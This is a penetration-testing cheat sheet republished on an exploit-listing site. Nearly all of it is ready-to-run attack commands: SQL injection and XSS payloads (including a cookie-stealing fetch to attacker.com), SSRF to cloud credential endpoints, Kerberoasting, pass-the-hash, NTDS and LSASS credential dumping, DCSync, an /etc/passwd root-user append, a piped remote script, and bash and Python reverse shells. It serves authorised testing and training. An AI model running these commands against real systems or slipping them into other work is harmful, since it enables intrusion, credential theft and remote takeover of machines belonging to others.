Exploit for pentest-cheatsheet

Name: Exploit for pentest-cheatsheet
Rating: 5 (8 reviews)
2026-06-25 | CVSS 5.9
## https://sploitus.com/exploit?id=2DBFA02A-1FF8-528D-8CBD-0BB4657AC723
# pentest-cheatsheet
Commands, techniques and notes for penetration testing — web, AD, network, post-exploitation.
# Pentest Cheatsheet

> Commands, techniques and notes for penetration testing.  
> Covers: recon · web · Active Directory · post-exploitation · privilege escalation.

---

## Table of Contents
- [Recon & Scanning](#recon--scanning)
- [Web Application](#web-application)
- [Active Directory](#active-directory)
- [Post-Exploitation](#post-exploitation)
- [Privilege Escalation](#privilege-escalation)
- [Password Cracking](#password-cracking)
- [File Transfers](#file-transfers)
- [Reverse Shells](#reverse-shells)

---

## Recon & Scanning

### Nmap
```bash
# Fast full port scan
nmap -p- --min-rate 5000 -T4 

# Service + version + scripts on open ports
nmap -sCV -p 22,80,443 

# UDP scan (top 100)
nmap -sU --top-ports 100 

# OS detection
nmap -O 

# Vuln scripts
nmap --script vuln 

# Output all formats
nmap -sCV -p- -oA scan_results 
```

### Rustscan (faster)
```bash
rustscan -a  --ulimit 5000 -- -sCV
```

### Subdomain Enumeration
```bash
# Passive
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com

# Active bruteforce
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u https://FUZZ.target.com -mc 200,301,302

# Certificate transparency
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -u
```

### Directory Fuzzing
```bash
# gobuster
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

# ffuf
ffuf -u http://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -mc 200,301,302,403

# feroxbuster (recursive)
feroxbuster -u http://target.com -w wordlist.txt --depth 3
```

---

## Web Application

### SQLi — Manual
```bash
# Boolean-based
' AND 1=1-- -
' AND 1=2-- -

# Error-based
' AND extractvalue(1,concat(0x7e,version()))-- -

# Union — find columns
' ORDER BY 5-- -
' UNION SELECT NULL,NULL,NULL-- -

# Dump DB
' UNION SELECT table_name,NULL FROM information_schema.tables-- -
```

### SQLmap
```bash
# Basic
sqlmap -u "http://target.com/page?id=1" --dbs

# POST request
sqlmap -u "http://target.com/login" --data="user=test&pass=test" --dbs

# With cookie
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123" --dbs

# Dump table
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump

# OS shell
sqlmap -u "http://target.com/?id=1" --os-shell
```

### XSS
```javascript
// Basic
alert(1)

// Cookie steal
fetch('https://attacker.com/?c='+document.cookie)

// Bypass filters


">alert(1)
```

### SSRF
```bash
# Basic
http://169.254.169.254/latest/meta-data/          # AWS
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Bypass filters
http://127.0.0.1
http://0.0.0.0
http://[::1]
http://2130706433  # 127.0.0.1 decimal
```

### LFI
```bash
# Basic
/etc/passwd
../../../../../../etc/passwd

# Log poisoning → RCE
# 1. Inject PHP in User-Agent
curl -H "User-Agent: " http://target.com/

# 2. Include log
http://target.com/?file=/var/log/apache2/access.log&cmd=id

# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
php://input (POST: )
```

---

## Active Directory

### Enumeration
```bash
# NetExec (nxc)
nxc smb /24                           # Discover hosts
nxc smb  -u user -p pass --shares     # List shares
nxc smb  -u user -p pass --users      # List users
nxc smb  -u user -p pass --groups     # List groups
nxc smb  -u user -p pass -x "whoami"  # Execute command

# BloodHound collection
bloodhound-python -u user -p pass -d domain.local -ns  -c all

# Impacket — GetADUsers
impacket-GetADUsers -all domain.local/user:pass -dc-ip 

# LDAP enum
ldapsearch -H ldap:// -x -b "DC=domain,DC=local" -D "user@domain.local" -w pass
```

### Kerberos Attacks
```bash
# Kerberoasting — get TGS hashes
impacket-GetUserSPNs domain.local/user:pass -dc-ip  -request

# AS-REP Roasting (no preauth required)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip  -no-pass

# Pass-the-Ticket
impacket-getTGT domain.local/user:pass
export KRB5CCNAME=user.ccache
impacket-psexec domain.local/user@target -k -no-pass

# Overpass-the-Hash
impacket-getTGT domain.local/user -hashes :NThash
```

### Pass-the-Hash
```bash
# PSExec
impacket-psexec domain.local/admin@ -hashes :NThash

# SMBExec
impacket-smbexec domain.local/admin@ -hashes :NThash

# WMIExec
impacket-wmiexec domain.local/admin@ -hashes :NThash

# nxc
nxc smb  -u admin -H NThash -x "whoami"
```

### Credential Dumping
```bash
# SAM dump (local)
impacket-secretsdump local/admin:pass@

# Domain dump (NTDS.dit)
impacket-secretsdump domain.local/admin:pass@ -just-dc

# LSASS (remote)
nxc smb  -u admin -p pass -M lsassy
```

### DCSync
```bash
impacket-secretsdump domain.local/admin:pass@ -just-dc-user krbtgt
impacket-secretsdump domain.local/admin:pass@ -just-dc
```

---

## Post-Exploitation

### Windows
```powershell
# System info
whoami /all
systeminfo
net user /domain
net group "Domain Admins" /domain

# Find interesting files
dir /s /b *password* *cred* *secret* 2>nul
findstr /si password *.xml *.ini *.txt

# Scheduled tasks
schtasks /query /fo LIST /v

# Services
sc query type= all state= all
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
```

```bash
# WinPEAS (privesc enum)
.\winPEAS.exe

# PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

### Linux
```bash
# Basic enum
id && whoami
sudo -l
cat /etc/passwd | grep sh$
find / -perm -4000 -type f 2>/dev/null  # SUID

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

---

## Privilege Escalation

### Linux — Common vectors
```bash
# Sudo misconfiguration
sudo -l
sudo /bin/bash

# SUID abuse
find / -perm -u=s -type f 2>/dev/null
# Check GTFObins: https://gtfobins.github.io/

# Writable /etc/passwd
echo 'hacker:$(openssl passwd -1 password):0:0:root:/root:/bin/bash' >> /etc/passwd

# Writable cron script
echo "chmod +s /bin/bash" >> /path/to/cron/script.sh
```

### Windows — Common vectors
```powershell
# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Token impersonation (PrintSpoofer / GodPotato)
.\PrintSpoofer.exe -i -c cmd
```

---

## Password Cracking

```bash
# Hashcat
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt          # NTLM
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt         # Kerberoast
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt         # AS-REP
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule  # with rules

# John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
```

---

## File Transfers

```bash
# Python HTTP server (attacker)
python3 -m http.server 8080

# Victim — Linux
wget http:///file
curl http:///file -o file

# Victim — Windows (PowerShell)
iwr -uri http:///file -outfile file
certutil -urlcache -split -f http:///file file
```

---

## Reverse Shells

```bash
# Bash
bash -i >& /dev/tcp//4444 0>&1

# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat listener (attacker)
nc -lvnp 4444

# Shell upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z → stty raw -echo; fg → export TERM=xterm
```

---

## Resources

- [HackTricks](https://book.hacktricks.xyz/) — comprehensive pentesting wiki
- [GTFOBins](https://gtfobins.github.io/) — Unix binaries privesc
- [LOLBAS](https://lolbas-project.github.io/) — Windows living off the land
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) — payload lists
- [SecLists](https://github.com/danielmiessler/SecLists) — wordlists

---

*More writeups and techniques → [t.me/oxnull_security](https://t.me/oxnull_security) · [dev.to/0xnull](https://dev.to/0xnull)*